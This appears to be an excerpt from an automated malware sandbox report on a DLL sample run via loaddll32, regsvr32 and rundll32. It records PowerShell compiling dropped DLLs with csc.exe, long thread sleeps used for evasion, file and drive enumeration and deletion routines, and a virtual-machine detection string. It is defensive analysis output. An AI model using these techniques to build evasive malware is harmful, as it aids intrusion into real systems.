          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2728Thread sleep count: 31 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2728Thread sleep count: 31 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516Thread sleep count: 2687 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516Thread sleep count: 1542 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516Thread sleep time: -592128s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516Thread sleep count: 1728 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516Thread sleep time: -82944s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516Thread sleep count: 588 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516Thread sleep time: -56448s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516Thread sleep count: 1716 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516Thread sleep time: -41184s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516Thread sleep count: 1395 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516Thread sleep time: -267840s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516Thread sleep count: 174 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516Thread sleep count: 44 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6440Thread sleep count: 5010 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5876Thread sleep count: 861 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2320Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6460Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7048Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3120Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 604Thread sleep time: -8301034833169293s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4768Thread sleep count: 7538 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4768Thread sleep count: 1838 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1320Thread sleep time: -15679732462653109s >= -30000s
          Source: C:\Windows\System32\control.exe TID: 668Thread sleep time: -1773297476s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.dllJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.dllJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.dllJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.dllJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.dllJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\loaddll32.exeWindow / User API: threadDelayed 1599Jump to behavior
          Source: C:\Windows\System32\loaddll32.exeWindow / User API: threadDelayed 1057Jump to behavior
          Source: C:\Windows\System32\loaddll32.exeWindow / User API: threadDelayed 2880Jump to behavior
          Source: C:\Windows\System32\loaddll32.exeWindow / User API: threadDelayed 1015Jump to behavior
          Source: C:\Windows\System32\loaddll32.exeWindow / User API: threadDelayed 544Jump to behavior
          Source: C:\Windows\System32\loaddll32.exeWindow / User API: threadDelayed 733Jump to behavior
          Source: C:\Windows\System32\loaddll32.exeWindow / User API: threadDelayed 1856Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeWindow / User API: threadDelayed 2687Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeWindow / User API: threadDelayed 1542Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeWindow / User API: threadDelayed 1728Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeWindow / User API: threadDelayed 588Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeWindow / User API: threadDelayed 1716Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeWindow / User API: threadDelayed 1395Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 559Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 513Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 533Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 376Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 586Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 438Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5010
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 861
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5211
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 585
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7563
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1830
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7538
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1838
          Source: C:\Windows\System32\loaddll32.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0102D1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,0_2_0102D1A3
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_010259E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,0_2_010259E6
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0103F63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,0_2_0103F63F
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053DF63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,3_2_053DF63F
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053CD1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,3_2_053CD1A3
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053C59E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,3_2_053C59E6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04ABF63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,4_2_04ABF63F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04AAD1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,4_2_04AAD1A3
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04AA59E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,4_2_04AA59E6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C3F63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,5_2_04C3F63F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C259E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,5_2_04C259E6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C2D1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,5_2_04C2D1A3
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0103E230 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,0_2_0103E230
          Source: regsvr32.exe, 00000003.00000003.516252282.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.655416579.00000000032F3000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.654359694.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.655489490.000000000332C000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.471374260.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.515952009.00000000032E9000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.527705942.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.519374746.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517457436.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520220668.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.673893469.0000000003320000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_010449B3 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey,0_2_010449B3
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013A0C57 mov eax, dword ptr fs:[00000030h]0_2_013A0C57
